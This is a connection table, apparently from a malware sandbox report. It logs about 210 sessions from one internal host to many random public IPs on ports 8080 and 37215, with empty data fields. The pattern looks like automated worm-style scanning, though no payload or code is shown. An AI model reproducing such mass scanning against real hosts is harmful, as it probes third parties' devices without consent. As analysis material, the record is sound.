                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35255192.168.2.2334408133.254.203.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35256192.168.2.2356968209.190.28.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35257192.168.2.2357618135.213.116.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35258192.168.2.2350204143.109.109.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35259192.168.2.233934854.64.3.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35260192.168.2.23457102.180.161.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35261192.168.2.2349540147.112.241.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35262192.168.2.2336604139.219.75.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35263192.168.2.234919241.122.107.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35264192.168.2.234624062.98.41.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35265192.168.2.2338442143.56.88.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35266192.168.2.234757023.171.160.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35267192.168.2.233492052.114.227.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35268192.168.2.234155667.127.43.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35269192.168.2.235972499.217.65.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35270192.168.2.23591465.174.52.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35271192.168.2.2345890189.172.68.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35272192.168.2.2358544125.229.205.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35273192.168.2.235093292.254.240.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35274192.168.2.2337604195.227.171.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35275192.168.2.235893449.68.20.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35276192.168.2.233467859.49.163.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35277192.168.2.2345540219.221.39.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35278192.168.2.2333286213.123.227.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35279192.168.2.23372821.168.29.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35280192.168.2.2348492107.98.54.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35281192.168.2.2336416209.201.6.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35282192.168.2.2346118116.214.155.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35283192.168.2.2359604180.105.237.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35284192.168.2.235076882.6.14.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35285192.168.2.2360200207.142.15.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35286192.168.2.2348418206.144.14.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35287192.168.2.234509014.40.45.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35288192.168.2.236024432.216.29.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35289192.168.2.2336028135.93.222.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35290192.168.2.2358686129.134.65.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35291192.168.2.235900813.36.244.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35292192.168.2.2360382208.223.200.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35293192.168.2.234630446.83.254.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35294192.168.2.2338764182.234.0.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35295192.168.2.235249437.221.27.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35296192.168.2.2350176211.227.24.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35297192.168.2.2348976193.117.175.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35298192.168.2.2352222174.239.229.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35299192.168.2.2341832150.30.130.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35300192.168.2.2351332217.248.110.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35301192.168.2.235546887.38.156.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35302192.168.2.235109279.43.16.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35303192.168.2.235262459.45.90.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35304192.168.2.2360474221.77.57.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35305192.168.2.234371252.64.58.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35306192.168.2.2339490178.128.64.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35307192.168.2.2343492165.140.56.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35308192.168.2.233974690.210.188.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35309192.168.2.2356244118.239.38.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35310192.168.2.2359890194.239.147.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35311192.168.2.2348104198.190.223.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35312192.168.2.235794694.111.184.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35313192.168.2.235825289.21.156.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35314192.168.2.234568899.42.142.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35315192.168.2.2346712181.174.164.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35316192.168.2.2357566104.45.127.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35317192.168.2.235459414.187.197.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35318192.168.2.234067072.192.3.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35319192.168.2.233292886.238.100.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35320192.168.2.233939832.140.34.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35321192.168.2.2359310110.34.106.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35322192.168.2.2358146120.179.239.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35323192.168.2.235412276.112.229.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35324192.168.2.2339032160.183.198.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35325192.168.2.2335312199.100.112.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35326192.168.2.2334714132.29.108.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35327192.168.2.2341700188.249.137.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35328192.168.2.235398482.70.30.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35329192.168.2.236086640.176.141.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35330192.168.2.234280676.148.91.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35331192.168.2.2340550122.217.237.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35332192.168.2.233464083.28.78.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35333192.168.2.2338384187.68.161.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35334192.168.2.2344790114.75.105.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35335192.168.2.2359776182.98.176.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35336192.168.2.2354954169.241.8.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35337192.168.2.2350966113.232.243.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35338192.168.2.2352102111.23.46.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35339192.168.2.235558486.45.222.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35340192.168.2.233791624.126.108.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35341192.168.2.2340634177.207.138.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35342192.168.2.2341564223.238.235.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35343192.168.2.2359426161.235.149.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35344192.168.2.234374269.113.132.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35345192.168.2.234767478.118.155.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35346192.168.2.2337558155.218.118.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35347192.168.2.2339546171.86.139.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35348192.168.2.2353026147.164.30.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35349192.168.2.2356838131.229.140.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35350192.168.2.2334550196.51.39.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35351192.168.2.2340040143.250.181.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35352192.168.2.2337068180.2.204.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35353192.168.2.2348422145.87.17.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35354192.168.2.236000062.241.239.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35355192.168.2.236032085.8.128.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35356192.168.2.2350292194.107.94.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35357192.168.2.233997453.83.176.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35358192.168.2.2345232213.209.109.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35359192.168.2.2347016176.34.78.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35360192.168.2.2333398151.40.239.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35361192.168.2.2333114167.175.154.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35362192.168.2.2339238186.191.60.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35363192.168.2.23465062.223.238.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35364192.168.2.234073443.54.225.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35365192.168.2.234232848.35.229.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35366192.168.2.2334036122.247.240.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35367192.168.2.2349230111.47.182.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35368192.168.2.2346122222.165.61.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35369192.168.2.235755827.106.196.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35370192.168.2.2339824128.226.51.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35371192.168.2.234131288.246.46.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35372192.168.2.2345204203.10.54.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35373192.168.2.235318052.201.141.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35374192.168.2.2352070160.97.147.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35375192.168.2.2359960104.243.18.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35376192.168.2.235260847.160.246.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35377192.168.2.2358164164.59.28.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35378192.168.2.2355574203.196.240.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35379192.168.2.2355196125.175.193.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35380192.168.2.2342638168.53.212.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35381192.168.2.234969060.90.3.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35382192.168.2.2357784190.199.80.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35383192.168.2.235814086.86.129.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35384192.168.2.2346980102.23.175.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35385192.168.2.234626096.215.83.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35386192.168.2.2357158141.252.105.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35387192.168.2.2341214130.229.76.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35388192.168.2.234060897.81.109.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35389192.168.2.2339346108.173.126.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35390192.168.2.235371488.150.205.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35391192.168.2.2355170117.232.197.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35392192.168.2.233603267.35.49.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35393192.168.2.2342050181.158.190.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35394192.168.2.235274436.230.89.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35395192.168.2.233752894.109.67.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35396192.168.2.2353762126.219.52.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35397192.168.2.2349752196.195.230.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35398192.168.2.2344906176.178.207.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35399192.168.2.2353574221.139.68.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35400192.168.2.2337680174.178.98.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35401192.168.2.2340286132.21.159.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35402192.168.2.234644648.154.79.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35403192.168.2.23551362.208.38.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35404192.168.2.2358570200.205.76.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35405192.168.2.2335326199.29.137.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35406192.168.2.2338768106.223.180.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35407192.168.2.235260269.191.141.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35408192.168.2.235410217.84.181.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35409192.168.2.2349914152.93.78.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35410192.168.2.2346920134.102.142.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35411192.168.2.2333550169.32.51.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35412192.168.2.2341376209.186.180.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35413192.168.2.2354446210.249.73.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35414192.168.2.235390213.53.95.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35415192.168.2.2350372153.187.60.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35416192.168.2.2343032194.121.27.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35417192.168.2.235323641.157.213.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35418192.168.2.2337044197.169.62.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35419192.168.2.2348572157.194.6.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35420192.168.2.2353762197.2.183.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35421192.168.2.2358592178.203.68.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35422192.168.2.2357974157.217.245.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35423192.168.2.235790841.6.132.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35424192.168.2.233965259.229.158.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35425192.168.2.2337752157.137.105.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35426192.168.2.235505058.37.89.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35427192.168.2.235942441.230.131.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35428192.168.2.2346720197.7.192.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35429192.168.2.2351434157.34.155.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35430192.168.2.2358310197.86.203.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35431192.168.2.235955241.180.11.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35432192.168.2.2336906171.222.5.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35433192.168.2.2347740185.104.120.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35434192.168.2.234228441.240.77.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35435192.168.2.2345014197.161.201.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35436192.168.2.2360952197.81.10.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35437192.168.2.2356614197.2.35.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35438192.168.2.235456441.25.195.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35439192.168.2.236079841.106.181.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35440192.168.2.2355478197.1.196.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35441192.168.2.2357796223.45.62.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35442192.168.2.236027841.40.0.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35443192.168.2.2354276157.255.120.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35444192.168.2.2334374157.70.34.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35445192.168.2.2354464157.160.6.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35446192.168.2.234984496.187.119.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35447192.168.2.233821641.155.112.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35448192.168.2.2336438181.8.31.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35449192.168.2.2334866157.217.91.18637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35450192.168.2.2360982197.202.254.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35451192.168.2.235956881.143.103.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35452192.168.2.2342944157.121.96.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35453192.168.2.2345816157.63.247.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35454192.168.2.2355466157.15.186.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35455192.168.2.235179841.249.140.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35456192.168.2.2342336157.154.230.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35457192.168.2.234655641.250.154.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35458192.168.2.2349884197.130.201.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35459192.168.2.2356286197.141.234.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35460192.168.2.2340456179.19.106.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35461192.168.2.2347486157.96.207.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35462192.168.2.233885441.211.110.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35463192.168.2.2353862157.16.31.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35464192.168.2.2345624157.184.69.4437215
                                                        TimestampBytes transferredDirectionData


